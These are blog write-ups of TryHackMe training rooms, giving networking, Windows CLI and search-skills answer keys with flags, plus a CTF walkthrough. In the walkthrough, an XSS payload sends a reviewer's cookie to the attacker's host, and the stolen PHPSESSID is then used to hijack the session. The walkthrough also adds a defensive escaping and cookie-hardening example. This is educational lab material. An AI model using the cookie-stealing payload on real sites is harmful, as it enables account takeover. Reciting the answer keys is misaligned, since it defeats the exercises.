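    return all(part.isdigit() and 0 <= int(part) <= 255 for part in parts)


def is_private(addr: str) -> bool:
    """True when the (valid) address lies in one of the RFC 1918 blocks."""
    if not is_valid_ipv4(addr):
        raise ValueError(f"not a valid IPv4 address: {addr}")
    ip = ipaddress.IPv4Address(addr)
    return any(ip in net for net in PRIVATE_RANGES)


def find_invalid(addrs) -> list:
    return [a for a in addrs if not is_valid_ipv4(a)]


def find_public(addrs) -> list:
    """Valid addresses that are not private (candidates for Q 4.1)."""
    return [a for a in addrs if is_valid_ipv4(a) and not is_private(a)]


def same_subnet(a: str, b: str, prefix_len: int) -> bool:
    """True when b lies in the network that a belongs to at the given prefix length."""
    net = ipaddress.ip_network(f"{a}/{prefix_len}", strict=False)
    return ipaddress.IPv4Address(b) in net


# The answer options from Task 4.
Q41_OPTIONS = ["192.168.250.125", "10.20.141.132", "49.69.147.197", "172.23.182.251"]
Q42_OPTIONS = ["192.168.250.15", "192.168.254.17", "192.168.305.19", "192.168.199.13"]

if __name__ == "__main__":
    print("public in Q 4.1:", find_public(Q41_OPTIONS))
    print("invalid in Q 4.2:", find_invalid(Q42_OPTIONS))
    print("same /24?", same_subnet("192.168.250.15", "192.168.254.17", 24))
```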

Task 5 UDP and TCP

In this task, we will explore the two most important transport layer protocols which are essential for providing end-to-end connectivity. These protocols are Transmission Control Protocol (TCP) which is used for reliable communication and User Datagram Protocol (UDP) which is used for fast data transmission. 

Q 5.1- Which protocol requires a three-way handshake?

A 5.1- TCP

Q 5.2- What is the approximate number of port numbers (in thousands)?

A 5.2- 65

Task 6 Encapsulation

Here, we are going to explore the concept of encapsulation, which is the process of adding a header and trailer at each layer to the data received from the previous layer. After reading the content, you can answer the following questions.

Q 6.1- On a WiFi, within what will an IP packet be encapsulated?

A 6.1- Frame

Q 6.2- What do you call the UDP data unit that encapsulates the application data?

A 6.2- Datagram

Q 6.3- What do you call the data unit that encapsulates the application data sent over TCP?

A 6.3- Segment

Task 7 Telnet

Telnet is another useful protocol that allows us to connect to open ports on a remote host and run text commands, which can be useful for accessing services like HTTP, SMTP, echo, etc. This can help us gather information about the versions of the services running on the target machine.

Q 7.1- Use telnet to connect to the web server on MACHINE_IP. What is the name and version of the HTTP server?

A 7.1- lighttpd/1.4.63

Q 7.2- What flag did you get when you viewed the page?

A 7.2- THM{TELNET_MASTER}

Task 8 Conclusion

Please note and remember all the concepts, network layers, and protocols explained in this room.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Windows Command Line

Hello Folks,
In this write-up, we will discuss the answers for the “Windows Command Line” room, which is a segment of the “Cyber Security 101” learning path. This blog covers the concepts of using the Windows CLI for day-to-day tasks such as file management, gathering system information, monitoring processes, etc. Harnessing the power of the CLI offers speed, efficiency, and advantages like automation and remote management.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives and prerequisites for the Windows command line interface, which is essential in cyber security.

Q 1.1- What is the default command line interpreter in the Windows environment?

A 1.1- cmd.exe

Task 2 Basic System Information

This task will guide us through some basic but important commands like set, ver, systeminfo, more, cls, and some CLI-based operators. Using these commands, we can get information about our system.

Q 2.1- What is the OS version of the Windows VM?

A 2.1- 10.0.20348.2655

Q 2.2- What is the hostname of the Windows VM?

A 2.2- WINSRV2022-CORE

Task 3 Network Troubleshooting

The Windows Command Prompt provides various vital utilities for network configuration and troubleshooting, such as ipconfig, ipconfig /all, ping, tracert, nslookup, and netstat. Each of these tools helps us perform networking-related tasks.

Q 3.1- Which command can we use to look up the server’s physical address (MAC address)?

A 3.1- ipconfig /all

Q 3.2- What is the name of the process listening on port 3389?

A 3.2- TermService

Q 3.3- What is the IP address of your gateway?

A 3.3- 10.10.0.1

Task 4 File and Disk Management

For managing the Windows file system, the CLI offers multiple commands such as cd, dir, mkdir, rmdir, tree, copy, move, type, and erase for traversing and managing files and directories. We can also use wildcards like *, which help handle multiple files and directories at once.

Q 4.1- What are the file’s contents in C:\Treasure\Hunt?

A 4.1- THM{CLI_POWER}

Task 5 Task and Process Management

For managing tasks and running processes in the Windows Command Prompt, we have an important utility called tasklist, which can list and filter the processes running on the machine. We can also terminate running processes with the taskkill command.

Q 5.1- What command would you use to find the running processes related to notepad.exe?

A 5.1- tasklist /FI "imagename eq notepad.exe"

Q 5.2- What command can you use to kill the process with PID 1516?

A 5.2- taskkill /PID 1516

Task 6 Conclusion

Q 6.1- The command shutdown /s can shut down a system. What is the command you can use to restart a system?

A 6.1- shutdown /r

Q 6.2- What command can you use to abort a scheduled system shutdown?

A 6.2- shutdown /a

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe | Answers For Search Skills

Hello Folks,

In this write-up, we will discuss the answers for the “Search Skills” room which is a segment of the “Cyber Security 101” learning path. This room helps you in building strong search skills to handle information overload, covering source evaluation, efficient search engine use, specialized search tools, technical documentation, social media, and news outlets.

You can access the room by clicking here.

Task 1 Introduction

This task will let you know the learning objectives of effective search skills that are required for this room.

Check how many results you get when searching for learn hacking. At the time of writing, we got 1.5 billion results when searching on Google.

No answer needed

Task 2 Evaluation of Search Results

The internet provides a platform for anyone to share their opinions, from blogs to wiki edits, making it necessary for readers to critically analyze information. Important evaluation aspects include authenticating the source’s reliability, inquiring into the quality of evidence, and verifying details through independent sources.

Q 2.1- What do you call a cryptographic method or product considered bogus or fraudulent?

A 2.1- Snake Oil

Q 2.2- What is the name of the command replacing netstat in Linux systems?

A 2.2- ss

Task 3 Search Engines

Many of us use search engines without taking full advantage of their features. By applying operators such as quotes for exact phrases, site: to target specific domains, - to exclude specific terms, and filetype: for file-specific searches, we can narrow the results and surface more relevant information on platforms like Google, Bing, or DuckDuckGo.

Q 3.1- How would you limit your Google search to PDF files containing the terms cyber warfare report?

A 3.1- filetype:pdf cyber warfare report

Q 3.2- What phrase does the Linux command ss stand for?

A 3.2- Socket Statistics

Task 4 Specialized Search Engines

Shodan, Censys, VirusTotal, and Have I Been Pwned are dedicated tools for identifying internet-connected devices, assessing network assets, evaluating files for malware, and checking whether an account appears in a data breach, respectively. Together these tools improve cybersecurity awareness and threat detection capabilities.

Q 4.1- What is the top country with lighttpd servers?

A 4.1- United States

Q 4.2- What does BitDefenderFalx detect the file with the hash 2de70ca737c1f4602517c555ddd54165432cf231ffc0e21fb2e23b9dd14e7fb4 as?

A 4.2- Android.Riskware.Agent.LHH

Task 5 Vulnerabilities and Exploits

The CVE program provides standardized IDs for vulnerabilities, helping users identify specific security issues, while the Exploit Database and GitHub offer verified exploit codes and proof-of-concepts for testing vulnerabilities under authorized conditions.

Q 5.1- What utility does CVE-2024-3094 refer to?

A 5.1- xz

Task 6 Technical Documentation

Consulting official documentation, such as Linux man pages, Microsoft Windows technical documentation, and other product documentation, is vital for getting the latest guidelines and configuration commands for various features. This helps with both troubleshooting and skill-building.

Q 6.1- What does the Linux command cat stand for?

A 6.1- Concatenate

Q 6.2- What is the netstat parameter in MS Windows that displays the executable associated with each active connection and listening port?

A 6.2- -b

Task 7 Social Media

Social media platforms are important sources for gathering personal information about individuals and organizations. It is important not to overshare our own information on these platforms, and to stay updated on cybersecurity trends and threats.

Q 7.1- You are hired to evaluate the security of a particular company. What is a popular social media website you would use to learn about the technical background of one of their employees?

A 7.1- LinkedIn

Q 7.2- Continuing with the previous scenario, you are trying to find the answer to the secret question, “Which school did you go to as a child?”. What social media website would you consider checking to find the answer to such secret questions?

A 7.2- Facebook

Task 8 Conclusion

Ensure you have noted the various search engines and resources mentioned in this room as they will be convenient in any cyber security path you follow.

No answer needed

You can check out our other blogs here.

Happy Pentesting!!!
Team CyberiumX

TryHackMe- Whats Your Name?

Hello Folks,
In this blog, we are going to solve a challenge that will test our client-side exploitation skills. The name of this challenge is “Whats Your Name?” and it is available on the TryHackMe platform. This CTF is only available to TryHackMe subscribers. We will be exploring some web application vulnerabilities like Cross-site Scripting (XSS), Session Hijacking, and Sensitive data exposure. Let’s start solving the challenge and begin the penetration testing process.
We have to start the machine by clicking on the “Start Machine” button and scan the obtained IP address using the Nmap tool with the help of the following command.

nmap -sS <Machine_IP>

1. Nmap

We will find three open ports, i.e. 22 (SSH), 80 (HTTP), and 8081 (HTTP). Let’s enumerate HTTP port 80 by adding the domain name to the /etc/hosts file. We can then open the browser and visit the website.

Getting Moderator’s Flag

On the webpage, we will find a registration form when we click on the “Register” button. Let’s provide some details here and test the parameters for an XSS vulnerability. The field that seems vulnerable is “Name”, so we can provide the following payload in this field to steal the cookies of the user who will review our registration details:

<script>document.location="http://<Kali_IP>:1337/cookie?c="+document.cookie</script>

2. Registration

On our Kali Linux machine, we have to start a Python web server on the 1337 port using the following command:

python3 -m http.server 1337

We can now submit the registration form to send the malicious XSS payload to the target user. After a few seconds, we will find a request on our Python web server with the cookie value of the victim user.

3. Got cookie

Now, we have to use these cookies to perform a session-hijacking attack on the victim user. We can add these cookies to our browser using the “Inspect” tool. Let’s press “Ctrl+Shift+I” to open the Inspect element and go to the Storage tab (on the Firefox browser). There we will find a cookie with the name “PHPSESSID”. If it is not there, we can add a cookie with this name and paste in the cookie value received from the victim user. After adding the value, we have to reload the page so that the cookie is sent to the server and we impersonate the victim user. After reloading the page, we will find that we are logged in as the Moderator user and we have our first flag.

4. moderator flag
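The two application defects this walkthrough chains together, the unescaped “Name” field and a session cookie readable from page scripts, shown beside their fixes. This is an added Node.js example, not code from the challenge or from TryHackMe; it assumes the name is rendered inside an HTML element body and uses the PHPSESSID cookie name from the room.

```javascript
// Added example (not part of the original walkthrough). Assumes the registration
// "Name" value is placed inside an HTML element body that a moderator later views,
// and that the session cookie is named PHPSESSID.

// Minimal HTML escaping for text placed inside an element body.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the submitted name is concatenated straight into markup,
// so a <script> element in the Name field executes in the reviewer's browser.
function renderRegistrationUnsafe(name) {
  return `<li class="pending">${name}</li>`;
}

// Fixed rendering: the same input is escaped and shown as text, never executed.
function renderRegistrationSafe(name) {
  return `<li class="pending">${escapeHtml(name)}</li>`;
}

// Session cookie as the challenge app effectively issues it: readable via document.cookie.
function sessionCookieWeak(sessionId) {
  return `PHPSESSID=${sessionId}; Path=/`;
}

// Hardened cookie: HttpOnly keeps document.cookie from exposing it to injected
// scripts; Secure and SameSite limit where the browser will send it.
function sessionCookieHardened(sessionId) {
  return `PHPSESSID=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Check a reviewer can run over a Set-Cookie value: does it carry the HttpOnly flag?
function cookieIsHttpOnly(setCookieValue) {
  return setCookieValue
    .split(";")
    .map((part) => part.trim().toLowerCase())
    .includes("httponly");
}

// Constructed probe input (a harmless script element) to compare both renderers.
const sampleProbe = "<script>alert(1)</script>";
```

With escaping in place the moderator's page shows the literal text, and with HttpOnly set the injected script could not have read the session identifier even if it had run.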

Getting Admin’s Flag

Now we have to find the admin flag. Let’s go back to the browser and we will find a new domain name where we can log in with these credentials after verifying the account. Let’s add the new domain name to our /etc/hosts file and start enumerating the directories using the Gobuster tool. We can use the following command for the same:

gobuster dir -u http://login.worldwap.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,py,txt,html

After running the above command, we will find some web pages. The “admin.py” page contains the credentials of the admin user, which we have to try. Another page, “login.php”, has a login form. Let’s try the admin user’s credentials on the login.php page. We will find that we are successfully logged in as the admin user. We can find the admin flag on the dashboard and submit it to solve this challenge.

5. Admin flag

Overall, this challenge was very easy for those with good knowledge of client-side vulnerabilities. Others must have gained a lot of knowledge of these vulnerabilities.
You can explore the walkthrough for TryHackMe’s CTF on our website and start learning about penetration testing.

Happy Pentesting!
Team CyberiumX